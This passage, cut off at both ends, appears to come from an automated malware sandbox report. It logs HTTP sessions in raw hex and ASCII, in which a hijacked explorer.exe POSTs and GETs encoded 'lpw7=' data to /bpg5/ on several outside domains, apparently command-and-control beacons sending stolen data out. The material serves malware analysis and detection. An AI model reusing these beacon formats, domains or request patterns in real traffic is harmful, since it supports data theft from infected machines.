5a 77 6f 33 2d 51 54 75 78 7a 36 4e 44 32 67 4b 57 77 53 6a 45 6e 35 34 59 55 63 53 49 68 57 4d 2d 5a 69 54 77 78 66 75 64 73 5a 4f 67 73 6d 70 75 62 65 65 6b 4d 61 6d 2d 4c 32 77 54 67 76 54 35 66 43 50 41 35 53 34 61 4e 50 33 4a 55 58 4e 41 6b 32 36 45 30 46 71 48 6d 62 43 31 66 69 58 6e 69 59 32 62 6a 36 50 41 42 5f 61 47 62 38 48 6a 64 38 70 73 64 34 69 4e 43 74 62 78 66 41 74 49 64 59 62 6e 35 42 55 38 77 6b 55 35 6b 57 52 4b 4f 6c 78 5a 28 58 39 59 56 4d 6d 35 30 79 76 4e 4a 37 41 2d 68 50 71 62 67 59 4f 64 28 75 52 70 61 31 61 50 78 68 4e 77 28 30 63 2d 28 49 6c 55 69 54 58 5f 49 72 6f 45 42 2d 49 79 45 59 4d 71 4a 38 62 49 78 33 33 70 31 33 4e 59 61 67 47 4f 51 6f 48 66 79 33 35 36 57 34 56 31 37 33 41 31 65 5a 53 6f 37 4f 53 64 4a 46 53 42 43 49 66 72 41 63 54 32 61 43 58 6c 33 67 32 59 4e 74 55 4c 6b 38 28 33 48 52 69 74 63 68 67 76 7a 51 34 30 44 4b 58 4d 69 75 52 55 68 35 66 36 53 71 61 54 68 58 45 6e 72 61 72 4c 42
                                                  Data Ascii: lpw7=atXOqpN3yK6mJijxe2hNzuS7UMyg~0FTbX7nkVCFV42vRRyH4DyvDiejcl68spsNsHiBFYVUqe5YF2PsG5~4I96p1dd3TyWzdd~rP9ZQFASMWO5qUCHUPkGzuzLms-uPDA0fMWXf9zprbFhYZ1bES2lieG8YpkOdY4BcUx~NPvLjkeFjUtoBmDQ7kXg_ds(bJ2QBBcHWS8ex57gTfYPT4zACUELnZWfEuuD-LiW-49~JEGqlI4kGymGvD2MijpfegThnFiXVCTJI0fL_kJJR7WhXBaKgrDarukL9Fx7fsEITg2cU6U3KG96_pwh6YNhZ8imzg_PDZnwqNU6-xMRJKfZrxjmZTm5q6AOF9UA6OsNKAN7juZSgnsFLv9aFSvcsqUlA005j4C(DfrdQT7YDYE8Af5d5zbw0hFTw7Z16JLDhtkFwALrOrEN2YAX5EAyP5RrDz5dpDg8kIjZq(he3kMExYMdYt0GATuzZtaKKW3AiK5pVbYcdA04xaw1mpzEEK-Jh9AxoqEZkyzMrjsDnv79MZsA_jwY6HXbvuZkTXHbM43VZwo3-QTuxz6ND2gKWwSjEn54YUcSIhWM-ZiTwxfudsZOgsmpubeekMam-L2wTgvT5fCPA5S4aNP3JUXNAk26E0FqHmbC1fiXniY2bj6PAB_aGb8Hjd8psd4iNCtbxfAtIdYbn5BU8wkU5kWRKOlxZ(X9YVMm50yvNJ7A-hPqbgYOd(uRpa1aPxhNw(0c-(IlUiTX_IroEB-IyEYMqJ8bIx33p13NYagGOQoHfy356W4V173A1eZSo7OSdJFSBCIfrAcT2aCXl3g2YNtULk8(3HRitchgvzQ40DKXMiuRUh5f6SqaThXEnrarLB
                                                  May 25, 2023 11:37:41.184602976 CEST306INHTTP/1.1 405 Not Allowed
                                                  Server: nginx
                                                  Date: Thu, 25 May 2023 09:37:41 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 61 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: a6<html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.44969981.169.145.9380C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:36:21.576477051 CEST40OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.musicandgros.com
                                                  Connection: close
                                                  Content-Length: 186
                                                  Cache-Control: no-cache
                                                  Origin: http://www.musicandgros.com
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.musicandgros.com/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 45 47 6a 63 44 66 41 65 41 6e 32 52 4b 36 44 75 2d 33 79 74 7a 44 7a 32 52 33 65 78 68 38 72 33 6f 48 70 31 77 77 42 7e 72 53 61 4e 74 68 61 7e 46 49 31 70 55 7a 43 56 76 72 31 79 45 79 7a 68 70 56 69 63 45 4d 49 63 6c 53 72 7e 4c 28 33 65 77 32 51 50 6d 56 37 32 55 42 39 7e 36 33 6f 51 78 7a 78 41 52 68 52 50 4c 72 4e 64 31 6b 59 39 38 41 49 45 63 55 33 7a 39 6a 6f 67 6e 67 54 56 65 4c 47 28 6a 67 30 38 6b 68 30 47 44 45 36 55 79 53 72 38 6e 6b 32 30 58 28 66 34 51 6f 6a 43 6b 31 6a 4d 67 29 2e 00 00 00 00 00 00 00 00
                                                  Data Ascii: lpw7=jKc5GkmqQWJekEGjcDfAeAn2RK6Du-3ytzDz2R3exh8r3oHp1wwB~rSaNtha~FI1pUzCVvr1yEyzhpVicEMIclSr~L(3ew2QPmV72UB9~63oQxzxARhRPLrNd1kY98AIEcU3z9jogngTVeLG(jg08kh0GDE6UySr8nk20X(f4QojCk1jMg).
                                                  May 25, 2023 11:36:21.595796108 CEST41INHTTP/1.1 404 Not Found
                                                  Date: Thu, 25 May 2023 09:36:21 GMT
                                                  Server: Apache/2.4.57 (Unix)
                                                  Content-Length: 196
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  20192.168.2.449720185.134.245.11380C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:37:43.400509119 CEST307OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.thetowerbells.com
                                                  Connection: close
                                                  Content-Length: 186
                                                  Cache-Control: no-cache
                                                  Origin: http://www.thetowerbells.com
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.thetowerbells.com/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 61 74 58 4f 71 70 4e 33 79 4b 36 6d 4a 6c 28 78 64 43 56 4e 31 2d 53 37 5a 73 79 67 30 55 46 4a 62 58 28 46 6b 58 76 41 56 50 43 76 52 68 69 48 28 78 4b 76 43 69 65 73 58 46 36 34 79 5a 74 50 73 48 69 6a 46 64 74 55 71 65 64 59 58 43 6e 73 41 34 7e 37 4c 4e 36 52 38 39 64 79 54 79 61 70 64 64 79 37 50 39 42 51 46 48 32 4d 56 4f 70 71 65 42 76 55 61 45 47 71 6f 7a 4b 5f 73 2d 69 57 44 45 51 48 4d 57 72 66 7e 42 4e 72 43 78 74 59 54 43 48 45 64 57 6c 6e 55 6d 39 38 68 58 6e 5a 56 37 34 69 62 6e 65 2d 4a 4c 6e 30 68 76 31 71 44 51 29 2e 00 00 00 00 00 00 00 00
                                                  Data Ascii: lpw7=atXOqpN3yK6mJl(xdCVN1-S7Zsyg0UFJbX(FkXvAVPCvRhiH(xKvCiesXF64yZtPsHijFdtUqedYXCnsA4~7LN6R89dyTyapddy7P9BQFH2MVOpqeBvUaEGqozK_s-iWDEQHMWrf~BNrCxtYTCHEdWlnUm98hXnZV74ibne-JLn0hv1qDQ).
                                                  May 25, 2023 11:37:43.444216967 CEST308INHTTP/1.1 405 Not Allowed
                                                  Server: nginx
                                                  Date: Thu, 25 May 2023 09:37:43 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 61 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: a6<html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  21192.168.2.449721185.134.245.11380C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:37:55.686480999 CEST309OUTGET /bpg5/?lpw7=Xv/upeh51eH8JUjKDjNCkuTcNeiL8VtsCg7ztHvoG96mJwKh62aGaGa8UVClz5xrnRG3Z5NRq8txS1i3c96fEoalz7dwQDKkbQ==&UZCu=zJfEuRXw-P HTTP/1.1
                                                  Host: www.thetowerbells.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  May 25, 2023 11:37:55.730400085 CEST310INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Thu, 25 May 2023 09:37:55 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Expires: Thu, 25 May 2023 10:37:55 GMT
                                                  Cache-Control: max-age=3600
                                                  Cache-Control: public
                                                  Data Raw: 65 33 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 74 68 65 74 6f 77 65 72 62 65 6c 6c 73 2e 63 6f 6d 20 69 73 20 70 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 0a 2a 20 7b 6d 61 72 67 69 6e 3a 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 63 63 63 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 74 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 68 31 20 7b 0a 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 61 75 74 6f 20 32 30 70 78 20 31 30 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 33 34 39 38 64 62 3b 0a 7d 0a 0a 70 20 7b 0a 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 6d 69 6e 2d 77 69 64 74 68 3a 20 32 30 30 70 78 3b 0a 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 33 30 70 78 20 31 30 70 78 20 33 30 70 78 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 6d 69 6e 2d 68 65 69 67 68 74 3a 20 32 30 30 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 0a 6d 69 6e 2d 77 69 64 74 68 3a 20 34 35 30 70 78 3b 0a 6d 61 72 67 69 6e 3a 20 31 35 25 20 61 75 74 6f 20 30 70 78 20 61 75 74 6f 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 46 46 46 3b 0a 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 30 70 78 3b 0a 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 7d 0a 0a 69 6d 67 2e 6c 6f 67 6f 20 7b 0a 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 20 35 30 70 78 3b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 0a 2e 6c 6f 67 6f 63 6f 6e 74 20 7b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 61 6e 67 73 65 6c 65 63 74 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 20 31 30 70 78 3b 0a 72 69 67 68 74 3a 20 31 30 70 78 3b 0a 7d 0a 0a 2e 6c 61 6e 67 73 65 6c 65 63 74 20 69 6d 67 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 62 6f 72 64 65 72 3a 20 30 3b 0a 6d 61 72 67 69 6e 3a 20 32 70 78 3b 0a 68 65 69 67 68 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 66 6f 6f 74 65 72 20 7b 0a 63 6f 6c 6f 72 3a 20 23 61 61 61 3b 0a 6d 61 72 67 69 6e 3a 20 31 65 6d 20 61 75 74 6f 20 30 70 78 20 61 75 74 6f 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65
                                                  Data Ascii: e3f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>www.thetowerbells.com is parked</title> <style>* {margin: 0;padding: 0;}body {background: #ccc;font-family: Arial, Helvetica, sans-serif;font-size: 11pt;text-align: center;}h1 {margin: 10px auto 20px 10px;color: #3498db;}p {display: inline-block;min-width: 200px;margin: auto 30px 10px 30px;}.container {position: relative;text-align: left;min-height: 200px;max-width: 800px;min-width: 450px;margin: 15% auto 0px auto;background: #FFFFFF;border-radius: 20px;padding: 20px;box-sizing: border-box;}img.logo {width: auto;max-height: 50px;margin-top: 30px;border: 0;}.logocont {text-align: center;}.langselect {position: absolute;top: 10px;right: 10px;}.langselect img {position: relative;width: auto;border: 0;margin: 2px;height: 15px;}.footer {color: #aaa;margin: 1em auto 0px auto;font-size: 8pt;text-align: cente
                                                  May 25, 2023 11:37:55.730415106 CEST311INData Raw: 72 3b 0a 6d 69 6e 2d 77 69 64 74 68 3a 20 34 35 30 70 78 3b 0a 7d 0a 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 68 20 3d 20 7b 0a 27 65 6e 27 3a 27 77 77 77 2e 74
                                                  Data Ascii: r;min-width: 450px;} </style></head><body><script>var h = {'en':'www.thetowerbells.com is parked','no':'www.thetowerbells.com er parkert','sv':'www.thetowerbells.com r parkerad'};var u = {'en': 'www.domainnameshop.com/','n
                                                  May 25, 2023 11:37:55.730429888 CEST312INData Raw: 27 73 76 67 27 3a 27 70 6e 67 27 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 71 28 73 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 73 29 3b 0a 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a
                                                  Data Ascii: 'svg':'png';function q(s) { return document.getElementById(s);}</script><div class="container"> <h1 id="t">www.thetowerbells.com is parked</h1> <p id="m">www.thetowerbells.com is registered, but the owner currently does not
                                                  May 25, 2023 11:37:55.730439901 CEST313INData Raw: 7d 0a 0a 73 65 74 4c 61 6e 67 28 6c 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 21 2d 2d 2d 0a 0a 2d 2d 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: }setLang(l);</script></body></html>...--->0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.44970081.169.145.9380C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:36:24.124238968 CEST41OUTGET /bpg5/?lpw7=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTEx2mn7HsaAaANg==&UZCu=zJfEuRXw-P HTTP/1.1
                                                  Host: www.musicandgros.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  May 25, 2023 11:36:24.147530079 CEST42INHTTP/1.1 404 Not Found
                                                  Date: Thu, 25 May 2023 09:36:24 GMT
                                                  Server: Apache/2.4.57 (Unix)
                                                  Content-Length: 196
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  4192.168.2.449701198.177.124.5780C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:36:29.420424938 CEST44OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.gomarketing.info
                                                  Connection: close
                                                  Content-Length: 1482
                                                  Cache-Control: no-cache
                                                  Origin: http://www.gomarketing.info
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.gomarketing.info/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 44 79 6f 41 79 78 62 48 57 46 78 78 41 5a 4e 31 53 50 70 76 38 6e 57 4b 56 48 75 41 70 4b 6b 74 44 45 57 2d 59 55 34 5f 4a 61 68 66 4d 68 78 48 7a 43 30 46 4f 59 4e 65 6f 6a 64 54 6b 63 55 66 52 31 4e 77 76 5f 49 77 61 59 73 32 6f 51 54 2d 4b 6b 32 62 63 63 4a 30 4b 53 67 73 76 6a 45 74 77 6f 35 6e 4d 4d 7a 64 6f 41 6d 51 54 4d 48 36 37 66 57 55 78 41 50 59 53 5f 51 6e 70 59 47 65 38 54 48 47 74 63 58 45 54 61 41 62 7a 59 33 2d 6a 62 57 46 46 6a 6c 64 68 46 36 42 33 6b 45 71 78 45 4e 51 4e 67 52 76 35 6a 46 79 42 4d 33 6d 70 4c 4b 61 69 50 52 41 69 32 6d 2d 31 63 64 39 76 74 78 72 6f 77 56 67 75 42 61 4c 5a 59 52 6c 4d 78 64 45 37 74 34 35 42 57 43 5f 38 57 44 31 7a 68 38 54 6a 34 7e 39 47 64 49 79 41 6d 6a 4f 35 41 68 67 74 69 42 39 59 55 57 71 55 41 42 4b 34 70 35 4b 30 66 55 37 73 46 41 78 31 64 79 46 45 52 52 54 52 78 67 6f 6c 6d 4c 2d 6f 67 7a 39 71 77 67 7a 4a 66 47 62 4f 51 5a 52 57 69 31 61 69 30 44 66 45 6a 79 6a 54 52 61 78 52 43 73 5a 71 63 4a 72 28 62 39 4c 65 59 64 77 73 67 4a 4f 30 77 4d 4c 79 78 4d 35 79 75 43 34 59 6f 73 58 75 50 43 48 7a 51 4b 30 6b 4f 4f 43 4f 7a 4f 74 62 41 54 6e 41 51 56 47 59 70 45 66 59 6f 75 73 4c 35 6b 6b 51 41 35 55 39 67 67 6b 75 30 53 42 53 6f 6a 68 55 67 6c 73 66 69 6e 72 34 56 6c 63 6a 44 55 34 30 59 46 47 30 69 37 71 53 39 65 41 33 71 51 7a 76 31 58 75 57 63 6f 67 65 4d 62 4b 33 69 65 76 78 38 37 56 33 76 41 48 5a 4d 67 57 58 56 6c 56 47 71 32 6b 78 56 28 77 49 39 55 36 51 76 6a 59 48 6f 37 34 39 73 59 49 4f 59 36 77 59 5a 56 64 76 79 63 4f 71 41 6f 78 63 4f 72 55 30 6c 45 65 34 72 6e 42 58 79 52 64 42 68 77 79 5a 74 6c 4f 70 79 50 5f 7e 6f 41 43 41 74 61 2d 79 48 4d 52 7a 36 69 55 79 53 49 58 41 44 52 44 44 78 45 35 74 45 45 5f 74 41 77 51 72 41 47 4e 59 52 62 4c 55 5a 31 39 7e 5f 6c 6a 4e 47 74 30 56 73 55 57 6a 68 67 31 49 5a 4f 77 52 54 73 31 43 62 4f 49 50 79 64 34 4f 4b 39 52 55 37 79 4e 73 4a 6f 43 52 43 68 48 34 75 28 48 79 7a 36 4a 39 56 43 30 57 70 33 76 59 43 62 39 4b 31 48 53 4e 79 4d 46 4a 66 77 44 72 67 4a 69 59 57 38 46 64 77 30 78 6b 37 5a 35 6e 48 6c 73 58 5a 79 70 59 78 67 58 28 70 61 78 52 4c 6d 57 6f 30 61 59 6f 62 34 30 63 33 7e 31 78 68 39 75 6e 5a 4e 37 36 4e 66 6a 4b 59 75 44 6e 49 67 63 30 79 7e 53 35 49 69 7a 6b 51 7a 32 35 4c 44 38 38 67 44 71 63 34 48 48 32 62 5a 63 37 74 53 79 48 68 28 76 57 4a 4a 44 71 54 30 44 46 6d 52 6b 33 6d 49 32 4c 32 4a 62 77 4c 4a 34 30 6d 63 50 72 57 68 48 75 47 67 70 31 47 78 49 68 6c 71 65 51 56 6c 6e 50 2d 30 36 37 50 5a 63 4d 66 33 62 7a 31 4b 41 56 68 62 72 63 61 57 6e 36 6d 37 36 50 31 36 38 6f 43 48 59 72 64 43 75 77 45 52 53 66 6f 49 4c 37 76 65 6f 4b 39 5a 30 63 58 37 51 72 6f 75 30 7a 72 4e 46 74 65 64 64 34 57 75 46 41 43 49 4f 63 61 68 6f 55 48 28 67 4c 34 6d 32 34 72 5a 7a 39 67 72 42 65 68 78 57 33 6e 43 6d 35 74 4a 79 74 5a 33 61 78 7a 30 32 6a 33 61 65 73 66 47 32 38 42 32 53 6e 55 77 39 52 66 39 56 72 66 37 72 79 33 65 66 62 49 61 69 67 73 57 39 79 46 57 49 66 71 36 68 6b 5a 78 63 41 30 36 78 69 52 76 70 36 52 35 7a 68 4e 69 36 78 46 66 48 45 31 37 61 6e 4a 67 6c 6d 36 6a 42 69 4b 51 4b 28 4d 65 5f 34 63 7e 78 4e 7a 69 59 6b 42 74 68 45 32 28 31 68 45 7e 30 4d 6b 68 35 6d 30 54 56 4d 32 4e 5f 61 78 47 35 69 5a 54 4a 46 65 59 67 66 77 35 33 49 54 4f 43 56 79 73 58 38 6a 78 38 59 56 78 36 43 31 32 55 4e 51 37 33 4b 58 31 77 65 65 76 72 69 70 6a 64 7a 68 36 41 4a 77 46 44 64 66 6e 74 71 4f 58 56 37 66 30 56 31 46 54 4f 75 57 71 54 36 71 7e 48 57 75 79 50 48 4d 70 77 5a 69 62 47 50 4f 48 44 30 4a 30 4e 4f 42 33 71 5a 59 42 61 79 58 4e 78 6f 35 7e 61 51 33 32 55 31 5f 32 6e 7e 46 49 4e 28 61 78 33 65 37 6f 34 30 39 69 62 6a 5f 74 6e 6f 64 7e 63 41 73 72 4a 44 61 70 59 53 41 49 68 56 50 69 44 28 7a 4f 59 37 56 70 58 44 72 6c 64 33 6e 7a 78 65 42 72 61 79 51 33 72 73 59 37 36 6c 73 66 31 75 76 4c 57 7e 75 75 30 28 31 6d 76 53 53 47 47 47 30 63 54 75 57 37 64 76 66 33 33 6f 72 36 78 74 6e 4d 4a 58 4b 48 75 6e 66 69 34 46 38 45 34 44 56 44 35 7e 78 78 65 69 78 64 66 76 38 6c 6f 56 70 52 50 64 55 31 7a 30 43 5a 71 4c 45 6f 69 35 43 6a 4f 7a 71 37 70 6b 74 28 63 7e 45 7a 47 4f 36 4b 71 37 6f
